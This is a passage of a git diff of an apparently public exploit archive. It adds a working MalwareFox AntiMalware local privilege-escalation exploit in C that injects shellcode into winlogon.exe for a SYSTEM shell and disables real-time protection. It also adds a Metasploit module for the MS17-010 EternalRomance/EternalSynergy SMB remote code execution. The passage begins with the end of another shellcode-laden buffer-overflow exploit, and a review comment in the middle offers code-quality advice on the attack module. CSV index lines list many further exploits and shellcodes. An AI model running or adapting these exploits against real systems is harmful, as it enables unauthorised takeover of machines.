"\x9e\x34\x94\x6b\x0f\x11\x0f\x04\xb6\x38\xdb\xb5\x37\x97\xa6" + "\xf6\xbc\x14\x57\xb8\x34\x50\x4b\x2d\xb5\x2f\x31\xf8\xca\x85" + 
"\x5d\x66\x58\x42\x9d\xe1\x41\xdd\xca\xa6\xb4\x14\x9e\x5a\xee" + "\x8e\xbc\xa6\x76\xe8\x04\x7d\x4b\xf7\x85\xf0\xf7\xd3\x95\xcc" + "\xf8\x5f\xc1\x80\xae\x09\xbf\x66\x19\xf8\x69\x31\xf6\x52\xfd" + "\xc4\x34\x65\x7b\xc9\x10\x13\x63\x78\xcd\x62\x9c\xb5\x99\x62" + "\xe5\xab\x39\x8c\x3c\x68\x59\x6f\x94\x85\xf2\x36\x7d\x24\x9f" + "\xc8\xa8\x6b\xa6\x4a\x58\x14\x5d\x52\x29\x11\x19\xd4\xc2\x6b" + "\x32\xb1\xe4\xd8\x33\x90"; + + char request_three[] = "&password=A"; + + int buffer_length = strlen(request_one) + 780 + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three); + int content_length = 9 + 780 + strlen(retn) + strlen(shellcode) + strlen(request_three); + char *content_length_string = malloc(15); + sprintf(content_length_string, "%d", content_length); + + char *buffer = malloc(buffer_length); + memset(buffer, 0x00, buffer_length); + strcpy(buffer, request_one); + strcat(buffer, content_length_string); + strcat(buffer, request_two); + strcat(buffer, padding); + strcat(buffer, retn); + strcat(buffer, shellcode); + strcat(buffer, request_three); + + SendRequest(buffer, strlen(buffer)); +} + +int main() { + + EvilRequest(); + return 0; +} \ No newline at end of file diff --git a/exploits/windows/local/43973.c b/exploits/windows/local/43973.c new file mode 100644 index 000000000..fcb5edfaf --- /dev/null +++ b/exploits/windows/local/43973.c 
@@ -0,0 +1,207 @@
+/*
+Title : MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
+Date : 02/02/2018
+Author : Souhail Hammou
+Vendor Homepage : https://www.malwarefox.com/
+Version : 2.74.0.150
+Tested on : Windows 7 32-bit / Windows 10 64-bit
+CVE : CVE-2018-6593
+*/
+#include
+#include
+#include
+#include
+
+#pragma comment(lib,"FltLib.lib")
+
+BOOL RegisterProcessByCommunicationPort()
+{
+ HRESULT hResult;
+ HANDLE hPort;
+
+ /*
+ Improper access control :
+ The default DACL for the filter communication port is superseded allowing everyone to connect to the port:
+
+ .text:0000000140011987 lea rcx, [rbp+SecurityDescriptor]
+ .text:000000014001198B mov edx, 1F0001h
+ .text:0000000140011990 call FltBuildDefaultSecurityDescriptor ;default SD only allows SYSTEM & Admins to connect
+ .text:0000000140011995 test eax, eax
+
+ [.........]
+
+ .text:00000001400119B1
+ .text:00000001400119B1 loc_1400119B1: ; CODE XREF: sub_140011890+107j
+ .text:00000001400119B1 mov rcx, [rbp+SecurityDescriptor] ; SecurityDescriptor
+ .text:00000001400119B5 xor r9d, r9d ; DaclDefaulted
+ .text:00000001400119B8 xor r8d, r8d ; Dacl
+ .text:00000001400119BB mov dl, 1 ; DaclPresent
+ .text:00000001400119BD call cs:RtlSetDaclSecurityDescriptor ; <= Vuln: SD's DACL pointer is set to NULL, granting access to everyone
+
+ Once connected to the port, the driver automatically registers the process
+ as trusted. This allows the process to issue IOCTL codes that couldn't be sent otherwise.
+ e.g. disable real-time protection, write to raw disk, open full access handles to processes ...etc
+ */
+
+ hResult = FilterConnectCommunicationPort(
+ L"\\GLOBAL??\\ZAM_MiniFilter_CommPort",
+ 0,
+ NULL,
+ 0,
+ NULL,
+ &hPort);
+
+ if (hResult != S_OK)
+ {
+ return FALSE;
+ }
+ CloseHandle(hPort);
+ return TRUE;
+}
+
+DWORD GetWinlogonPID()
+{
+ DWORD WinlogonPid = 0;
+ PROCESSENTRY32 ProcessEntry;
+ ProcessEntry.dwSize = sizeof(PROCESSENTRY32);
+
+ HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+ if (hSnapshot == INVALID_HANDLE_VALUE)
+ {
+ printf("[-] CreateToolhelp32Snapshot failed !\n");
+ goto ret;
+ }
+
+ if (!Process32First(hSnapshot, &ProcessEntry))
+ {
+ printf("[-] Process32First failed !\n");
+ goto cleanup;
+ }
+
+ do
+ {
+ if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
+ {
+ WinlogonPid = ProcessEntry.th32ProcessID;
+ break;
+ }
+ } while (Process32Next(hSnapshot, &ProcessEntry));
+
+cleanup:
+ CloseHandle(hSnapshot);
+ret:
+ return WinlogonPid;
+}
+int main(int argc, char** argv)
+{
+ DWORD BytesReturned;
+ DWORD winlogon_pid;
+ HANDLE winlogon_handle;
+ LPVOID RemoteAllocation;
+ HANDLE hDevice;
+
+ printf("=== MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation ===\n");
+ printf(" Tested on Windows 10 64-bit \n");
+ printf(" Souhail Hammou \n\n");
+ printf("[*] Stage 1: Registering the process with the driver by connecting to the minifilter communication port\n");
+
+ hDevice = CreateFile
+ ("\\\\.\\ZemanaAntiMalware",
+ GENERIC_READ | GENERIC_WRITE,
+ 0,
+ NULL,
+ OPEN_EXISTING,
+ FILE_ATTRIBUTE_NORMAL,
+ NULL
+ );
+ if (hDevice == INVALID_HANDLE_VALUE)
+ {
+ return 0;
+ }
+
+
+ if (!RegisterProcessByCommunicationPort())
+ {
+ printf("\t[-] Registration Failed !\n");
+ return 0;
+ }
+
+ printf("\t[+] Process registered.\n[*] Stage 2: \n");
+
+ printf("\t[+] Getting Winlogon's PID\n");
+ winlogon_pid = GetWinlogonPID();
+
+ if (!winlogon_pid)
+ {
+ printf("\t[-] GetWinlogonPID() failed !\n");
+ return 0;
+ }
+
+ printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");
+
+ /*
+ The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
+ We use this IOCTL to open a full access handle to winlogon.exe.
+ Note that this IOCTL can only be sent if the process is registered with the driver.
+ */
+ if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
+ {
+ printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
+ return 0;
+ }
+
+ printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");
+
+ if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
+ {
+ printf("\t[-] VirtualAllocEx failed !\n");
+ return 0;
+ }
+
+ printf("\t[+] Writing shellcode to allocated memory\n");
+
+ /*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
+ unsigned char buf[] =
+ "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
+ "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
+ "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
+ "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
+ "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
+ "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
+ "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
+ "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
+ "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
+ "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
+ "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
+ "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
+ "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
+ "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
+ "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+ "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
+ "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
+ "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
+ "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
+ "\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
+
+ if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
+ {
+ printf("\t[-] WriteProcessMemory Failed !\n");
+ return 0;
+ }
+
+ printf("\t[+] Spawning SYSTEM shell\n");
+ if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
+ {
+ printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
+ return 0;
+ }
+
+ printf("[*] Bonus:\n\t[+] Disabling real-time protection\n");
+ if (!DeviceIoControl(hDevice, 0x80002090, NULL, 0, NULL, 0, &BytesReturned, NULL))
+ {
+ printf("\t[-] DeviceIoControl 0x80002090 failed !\n");
+ return 0;
+ }
+ printf("\t[+] RT protection disabled.");
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/remote/43970.rb b/exploits/windows/remote/43970.rb
new file mode 100755
index 000000000..4cab115f7
--- /dev/null
+++ b/exploits/windows/remote/43970.rb
@@ -0,0 +1,339 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# Windows XP systems that are not part of a domain default to treating all +# network logons as if they were Guest. This prevents SMB relay attacks from +# gaining administrative access to these systems. This setting can be found +# under: +# +# Local Security Settings > +# Local Policies > +# Security Options > +# Network Access: Sharing and security model for local accounts + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010 + include Msf::Exploit::Powershell + include Msf::Exploit::EXE + include Msf::Exploit::WbemExec + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution', + 'Description' => %q{ + This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where + primitive. This will then be used to overwrite the connection session information with as an + Administrator session. From there, the normal psexec payload code execution is done. + + Exploits a type confusion between Transaction and WriteAndX requests and a race condition in + Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy + exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a + named pipe. 
+ }, + 'Author' => + [ + 'sleepya', # zzz_exploit idea and offsets + 'zerosum0x0', + 'Shadow Brokers', + 'Equation Group' + ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'EXITFUNC' => 'thread' + }, + 'References' => + [ + [ 'AKA', 'ETERNALSYNERGY' ], + [ 'AKA', 'ETERNALROMANCE' ], + [ 'AKA', 'ETERNALCHAMPION' ], + [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred + [ 'MSB', 'MS17-010' ], + [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests + [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests + [ 'CVE', '2017-0147'], # for EternalRomance reference + [ 'URL', 'https://github.com/worawit/MS17-010' ], + [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ], + [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ], + ], + 'Payload' => + { + 'Space' => 3072, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => + [ + [ 'Automatic', { } ], + [ 'PowerShell', { } ], + [ 'Native upload', { } ], + [ 'MOF upload', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 14 2017' + )) + + register_options( + [ + OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share", 'ADMIN$' ]) + ]) + + register_advanced_options( + [ + OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]), + OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]), + OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']), + OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub",nil]) + ]) + end + + def exploit + begin + eternal_pwn(datastore['RHOST']) + smb_pwn() + + rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e + print_error("#{e.message}") + rescue ::Errno::ECONNRESET, + ::Rex::Proto::SMB::Exceptions::LoginError, + ::Rex::HostUnreachable, + ::Rex::ConnectionTimeout, + ::Rex::ConnectionRefused => e + print_error("#{e.class}: #{e.message}") + rescue => error + print_error(error.class.to_s) + print_error(error.message) + print_error(error.backtrace.join("\n")) + ensure + eternal_cleanup() # restore session + end + end + + def smb_pwn() + case target.name + when 'Automatic' + if powershell_installed? + print_status('Selecting PowerShell target') + powershell + else + print_status('Selecting native target') + native_upload + end + when 'PowerShell' + powershell + when 'Native upload' + native_upload + when 'MOF upload' + mof_upload + end + + handler + end + + + # TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to + # be moved into a mixin + + def powershell_installed? 
+ share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}" + + case datastore['SHARE'].upcase + when 'ADMIN$' + path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe' + when 'C$' + path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' + else + path = datastore['PSH_PATH'] + end + + simple.connect(share) + + vprint_status("Checking for #{path}") + + if smb_file_exist?(path) + vprint_status('PowerShell found') + psh = true + else + vprint_status('PowerShell not found') + psh = false + end + + simple.disconnect(share) + + psh + end + + def powershell + ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME'] + command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) + + if datastore['PSH::persist'] and not datastore['DisablePayloadHandler'] + print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option") + end + + # Execute the powershell command + print_status("Executing the payload...") + begin + psexec(command) + rescue StandardError => exec_command_error + fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}") + end + end + + def native_upload + filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe" + servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8) + serviceencoder = datastore['SERVICE_STUB_ENCODER'] || '' + + # Upload the shellcode to a file + print_status("Uploading payload...") + smbshare = datastore['SHARE'] + fileprefix = "" + # if SHARE = Users/sasha/ or something like this + if smbshare =~ /.[\\\/]/ + subfolder = true + smbshare = datastore['SHARE'].dup + smbshare = smbshare.gsub(/^[\\\/]/,"") + folder_list = smbshare.split(/[\\\/]/) + smbshare = folder_list[0] + fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1 + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + fd = smb_open("\\#{fileprefix}\\#(unknown)", 'rwct') + else + subfolder = false + 
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + fd = smb_open("\\#(unknown)", 'rwct') + end + exe = '' + opts = { :servicename => servicename, :serviceencoder => serviceencoder} + begin + exe = generate_payload_exe_service(opts) + + fd << exe + ensure + fd.close + end + + if subfolder + print_status("Created \\#{fileprefix}\\#(unknown)...") + else + print_status("Created \\#(unknown)...") + end + + # Disconnect from the share + simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}") + + # define the file location + if datastore['SHARE'] == 'ADMIN$' + file_location = "%SYSTEMROOT%\\#(unknown)" + elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/ + file_location = datastore['SHARE'].slice(0,1) + ":\\#(unknown)" + else + file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#(unknown)" + end + + psexec(file_location, false) + + unless datastore['SERVICE_PERSIST'] + print_status("Deleting \\#(unknown)...") + #This is not really useful but will prevent double \\ on the wire :) + if datastore['SHARE'] =~ /.[\\\/]/ + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + begin + simple.delete("\\#{fileprefix}\\#(unknown)") + rescue XCEPT::ErrorCode => e + print_error("Delete of \\#{fileprefix}\\#(unknown) failed: #{e.message}") + end + else + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + begin + simple.delete("\\#(unknown)") + rescue XCEPT::ErrorCode => e + print_error("Delete of \\#(unknown) failed: #{e.message}") + end + end + end + end + + def mof_upload + share = "\\\\#{datastore['RHOST']}\\ADMIN$" + filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe" + + # payload as exe + print_status("Trying wbemexec...") + print_status("Uploading Payload...") + if datastore['SHARE'] != 'ADMIN$' + print_error('Wbem will only work with ADMIN$ share') + return + end + simple.connect(share) + exe = generate_payload_exe + fd = smb_open("\\system32\\#(unknown)", 'rwct') + fd << exe + fd.close + print_status("Created 
%SystemRoot%\\system32\\#(unknown)") + + # mof to cause execution of above + mofname = rand_text_alphanumeric(14) + ".MOF" + mof = generate_mof(mofname, filename) + print_status("Uploading MOF...") + fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct') + fd << mof + fd.close + print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}") + + # Disconnect from the ADMIN$ + simple.disconnect(share) + end + + def report_auth + service_data = { + address: ::Rex::Socket.getaddress(datastore['RHOST'],true), + port: datastore['RPORT'], + service_name: 'smb', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: self.fullname, + private_data: datastore['SMBPass'], + username: datastore['SMBUser'].downcase + } + + if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP' + credential_data.merge!({ + realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN, + realm_value: datastore['SMBDomain'] + }) + end + + if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/ + credential_data.merge!({:private_type => :ntlm_hash}) + else + credential_data.merge!({:private_type => :password}) + end + + credential_data.merge!(service_data) + + credential_core = create_credential(credential_data) + + login_data = { + access_level: 'Admin', + core: credential_core, + last_attempted_at: DateTime.now, + status: Metasploit::Model::Login::Status::SUCCESSFUL + } + + login_data.merge!(service_data) + create_credential_login(login_data) + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 624054667..c7a469a0a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
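Review bot: `powershell` tests `datastore['PSH::persist'] and not datastore['DisablePayloadHandler']` with the low-precedence `and`/`not` keywords, which RuboCop flags and which silently change meaning if an assignment or a call with arguments is ever added to the condition; use `if datastore['PSH::persist'] && !datastore['DisablePayloadHandler']`. The same style point applies to the empty-parenthesis calls `smb_pwn()` and `eternal_cleanup()` in `exploit`, which idiomatic Ruby writes without parens. As rendered here, `native_upload` and `mof_upload` pass the literal `#(unknown)` to `smb_open`, `simple.delete` and the `file_location` strings where the interpolated `filename` local would be expected, leaving `filename` assigned but never read — presumably a rendering artifact, but worth checking against the original module. `report_auth` also has no caller anywhere in this hunk.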
@@ -5485,6 +5485,9 @@ id,file,description,date,author,type,platform,port
 43930,exploits/windows/dos/43930.py,"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow",2018-01-30,"Miguel Mendez Z",dos,windows,
 43937,exploits/multiple/dos/43937.html,"WebKit - 'detachWrapper' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple,
 43938,exploits/multiple/dos/43938.html,"WebKit - 'WebCore::FrameView::clientToLayoutViewportPoint' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple,
+43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php,
+42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,
+43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333
 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@@ -9308,6 +9311,9 @@ id,file,description,date,author,type,platform,port
 43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows,
 43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux,
 43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,
+43971,exploits/linux/local/43971.rb,"Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)",2018-02-05,Metasploit,local,linux,
+43973,exploits/windows/local/43973.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-05,"Souhail Hammou",local,windows,
+43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -15982,6 +15988,7 @@ id,file,description,date,author,type,platform,port
 43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows,
 43936,exploits/windows/remote/43936.py,"Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)",2018-02-01,"Daniel Teixeira",remote,windows,
 43939,exploits/multiple/remote/43939.rb,"BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)",2018-02-01,Metasploit,remote,multiple,
+43970,exploits/windows/remote/43970.rb,"Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@@ -37970,6 +37977,18 @@ id,file,description,date,author,type,platform,port
 43959,exploits/php/webapps/43959.txt,"Joomla! Component JMS Music 1.1.1 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
 43960,exploits/multiple/webapps/43960.py,"Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal",2018-02-02,"Dmitry Chastuhin",webapps,multiple,
 43961,exploits/hardware/webapps/43961.txt,"FiberHome AN5506 - Unauthenticated Remote DNS Change",2018-02-02,r0ots3c,webapps,hardware,
+43963,exploits/php/webapps/43963.txt,"Wonder CMS 2.3.1 - Unrestricted File Upload",2018-02-05,"Samrat Das",webapps,php,
+43964,exploits/php/webapps/43964.txt,"Wonder CMS 2.3.1 - 'Host' Header Injection",2018-02-05,"Samrat Das",webapps,php,
+43965,exploits/php/webapps/43965.txt,"Matrimonial Website Script 2.1.6 - 'uid' SQL Injection",2018-02-05,L0RD,webapps,php,
+43966,exploits/php/webapps/43966.txt,"NixCMS 1.0 - 'category_id' SQL Injection",2018-02-05,"Bora Bozdogan",webapps,php,
+43967,exploits/php/webapps/43967.py,"Online Voting System - Authentication Bypass",2018-02-05,"Giulio Comi",webapps,php,
+43974,exploits/php/webapps/43974.txt,"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
+43975,exploits/php/webapps/43975.html,"Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
+43976,exploits/php/webapps/43976.txt,"Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
+43977,exploits/php/webapps/43977.php,"Joomla! Component jLike 1.0 - Information Leak",2018-02-05,"Ihsan Sencan",webapps,php,
+43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
+43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php,
+43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 4a79e9ef8..ef35c6e22 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -837,7 +837,7 @@ id,file,description,date,author,type,platform
 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86
 43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm
-43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2018-11-09,0x4ndr3,shellcode,linux_x86-64
+43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2017-11-09,0x4ndr3,shellcode,linux_x86-64
 43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64
 43953,shellcodes/linux_x86-64/43953.nasm,"Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)",2017-11-23,0x4ndr3,shellcode,linux_x86-64
 43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64